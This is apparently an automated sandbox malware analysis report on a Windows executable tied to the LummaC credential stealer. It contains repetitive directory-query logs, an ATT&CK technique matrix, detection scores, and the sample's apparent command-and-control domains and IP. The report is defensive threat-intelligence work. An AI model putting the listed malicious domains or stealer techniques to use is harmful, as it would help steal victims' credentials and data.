            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: uU6IvUPN39.exe PID: 2960, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Process Injection
            1
            Virtualization/Sandbox Evasion
            2
            OS Credential Dumping
            11
            Security Software Discovery
            Remote Services1
            Screen Capture
            21
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Process Injection
            LSASS Memory1
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin Shares41
            Data from Local System
            113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
            Obfuscated Files or Information
            NTDS2
            File and Directory Discovery
            Distributed Component Object Model2
            Clipboard Data
            Protocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
            Software Packing
            LSA Secrets22
            System Information Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            uU6IvUPN39.exe57%VirustotalBrowse
            uU6IvUPN39.exe55%ReversingLabsWin32.Trojan.Generic
            uU6IvUPN39.exe100%AviraHEUR/AGEN.1312582
            uU6IvUPN39.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://skidjazzyric.click/apij;100%Avira URL Cloudmalware
            https://skidjazzyric.click/100%Avira URL Cloudmalware
            https://skidjazzyric.click/X100%Avira URL Cloudmalware
            https://skidjazzyric.click:443/apiicrosoft100%Avira URL Cloudmalware
            https://skidjazzyric.click/&_100%Avira URL Cloudmalware
            https://skidjazzyric.click/E100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            skidjazzyric.click
            104.21.96.1
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              robinsharez.shopfalse
                high
                versersleep.shopfalse
                  high
                  https://skidjazzyric.click/apifalse
                    high
                    soundtappysk.shopfalse
                      high
                      crowdwarek.shopfalse
                        high
                        skidjazzyric.clickfalse
                          high
                          handscreamny.shopfalse
                            high
                            apporholis.shopfalse
                              high
                              chipdonkeruz.shopfalse
                                high
                                femalsabler.shopfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabuU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://skidjazzyric.click/apij;uU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440900569.000000000073A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icouU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://skidjazzyric.click/uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://skidjazzyric.click/XuU6IvUPN39.exe, 00000000.00000003.1440748963.00000000006FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.rootca1.amazontrust.com/rootca1.crl0uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://upx.sf.netAmcache.hve.4.drfalse
                                              high
                                              http://www.microsoft.uU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440924101.000000000076D000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440900569.000000000073A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://ocsp.rootca1.amazontrust.com0:uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.ecosia.org/newtab/uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bruU6IvUPN39.exe, 00000000.00000003.1469048428.00000000031BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ac.ecosia.org/autocomplete?q=uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://skidjazzyric.click:443/apiicrosoftuU6IvUPN39.exe, 00000000.00000003.1481330230.0000000002F38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://x1.c.lencr.org/0uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://x1.i.lencr.org/0uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchuU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.mozilla.org/products/firefoxgro.alluU6IvUPN39.exe, 00000000.00000003.1469048428.00000000031BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://skidjazzyric.click/&_uU6IvUPN39.exe, 00000000.00000003.1452952071.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1452838783.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1452979206.0000000002F1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://skidjazzyric.click/EuU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440900569.000000000073A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      104.21.96.1
                                                                      skidjazzyric.clickUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1586508
                                                                      Start date and time:2025-01-09 08:42:38 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 5m 1s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:10
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:uU6IvUPN39.exe
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:a478b8943ef3239752d731e7290c4a3d.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@2/5@1/1
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 92%
                                                                      • Number of executed functions: 17
                                                                      • Number of non-executed functions: 231
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.190.159.68, 4.175.87.197
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      TimeTypeDescription
                                                                      02:43:35API Interceptor5x Sleep call for process: uU6IvUPN39.exe modified
                                                                      02:43:46API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      104.21.96.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                      • pelisplus.so/administrator/index.php
                                                                      Recibos.exeGet hashmaliciousFormBookBrowse
                                                                      • www.mffnow.info/1a34/
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      skidjazzyric.clickxCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.112.1
                                                                      DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.48.1
                                                                      fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.80.1
                                                                      Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.64.1
                                                                      DPlvBkg4aj.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.112.1
                                                                      chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.80.1
                                                                      xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.80.1
                                                                      GR7ShhQTKE.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.64.1
                                                                      ab89jay39E.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.64.1
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSQUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                      • 104.21.64.1
                                                                      xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.56.70
                                                                      DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.56.70
                                                                      fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.80.1
                                                                      Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.64.1
                                                                      PO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3
                                                                      Subscription_Renewal_Invoice_2025_FGHDCS.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                      • 188.114.96.3
                                                                      PO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3
                                                                      DPlvBkg4aj.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.112.1
                                                                      https://qr.me-qr.com/PVhBu5SRGet hashmaliciousUnknownBrowse
                                                                      • 188.114.97.3
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      a0e9f5d64349fb13191bc781f81f42e1P2V7Mr3DUF.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.96.1
                                                                      v3tb7mqP48.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.96.1
                                                                      xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.96.1
                                                                      DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.96.1
                                                                      fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.96.1
                                                                      Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.96.1
                                                                      DPlvBkg4aj.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.96.1
                                                                      https://veryfast.io/?ap=adw&as=g_d_fast_in&dm%5Bads%5D=new_static&dm%5Btype%5D=dis&gad_source=5&gclid=EAIaIQobChMIgp352NzmigMVZAOzAB0wMA8oEAEYASAAEgI_hfD_BwEGet hashmaliciousUnknownBrowse
                                                                      • 104.21.96.1
                                                                      web55.mp4.htaGet hashmaliciousLummaCBrowse
                                                                      • 104.21.96.1
                                                                      No context
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):65536
                                                                      Entropy (8bit):1.0595824094751907
                                                                      Encrypted:false
                                                                      SSDEEP:96:M5FPrzbXLs9hBVon7Jf3QXIDcQAc6j7cEycw3a+HbHg/8BRTf3Oy1E45WAU6NCU6:QpXL2N0Ozofju3mFXzuiFcZZ24IO8e
                                                                      MD5:E1C7D7F00B950343ADE810DE913E16CD
                                                                      SHA1:CDB08F843892C80A71499CC46E0138D89406DE00
                                                                      SHA-256:8C76ACFA7842004266635277940D7EA494F4FD65E847C2483C557AFB817BE959
                                                                      SHA-512:1EAF1568A3058AD16974CB9F7B03C40D36E1C3B041D0C024C698C2F1B153DBF32B43F187235E5ED865B6A879153DB41357BC170DADDA631B9ADB9E9B4C1BA8DF
                                                                      Malicious:true
                                                                      Reputation:low
